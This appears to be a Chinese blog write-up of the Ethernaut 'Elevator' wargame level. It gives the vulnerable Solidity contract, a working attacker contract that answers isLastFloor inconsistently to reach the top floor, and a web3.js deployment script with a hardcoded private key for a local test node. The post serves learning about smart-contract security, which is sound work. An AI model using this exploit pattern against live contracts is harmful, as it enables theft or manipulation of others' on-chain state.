blockchain | ethernaut 11 Elevator

blockchain | ethernaut 11 Elevator

这关就是简单的合约交互,以及view/pure函数的编写。
合约:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

interface Building {
  function isLastFloor(uint) external returns (bool);
}


contract Elevator {
  bool public top;
  uint public floor;

  function goTo(uint _floor) public {
    Building building = Building(msg.sender);

    if (! building.isLastFloor(_floor)) {
      floor = _floor;
      top = building.isLastFloor(floor);
    }
  }
}

攻击合约:

pragma solidity ^0.8.0;
interface Elevator{
    function goTo(uint _floor) external;
}
contract Building {
    bool lock = false;
    function isLastFloor(uint num) public returns(bool){
        if (!lock){
            lock = true;
            return false;
        }
        return true;
    }
    function exp(address addr) public{
        Elevator e = Elevator(addr);
        e.goTo(100);
    }
}

交互脚本:

const Web3 = require('web3');
const fs = require('fs');
const deploy = require('./Deploy.js');   // 导入部署模块

const rpcURL = 'http://127.0.0.1:8545';
//const addr = '0xda8e0A6Becd46E3C1d25BEbcc0E8f6723Cf2F924';
const web3 = new Web3.Web3(rpcURL);    // 链接网络节点

const privateKey = '0x957c03cef7400defc7585d5dd81c48455557aa29c12c627ad0fd17d73effe696';
web3.eth.accounts.wallet.add(privateKey);
const wallet = web3.eth.accounts.wallet[0];
console.log(wallet)

let exp = async function(){
	console.log("Present balance: "+await web3.eth.getBalance(wallet.address));
	let aim_contract_addr = "0xf40F5ffd85b2C2aF5cAa50c4bc5d2C7793E1823e";
	// 部署攻击合约
	let hack_contract = await deploy("contracts/Building.json",web3,wallet);
	let ret = await hack_contract.methods.exp(aim_contract_addr).send({
		from: wallet.address,
		gas: 1000000,
		gasPrice: 10000000000,
	});
	console.log(ret)
	console.log(hack_contract.methods)
	console.log("lock: " + await web3.eth.getStorageAt(hack_contract._address, 0))
}

exp();
posted @ 2023-09-06 14:41  Mz1  阅读(11)  评论(0编辑  收藏  举报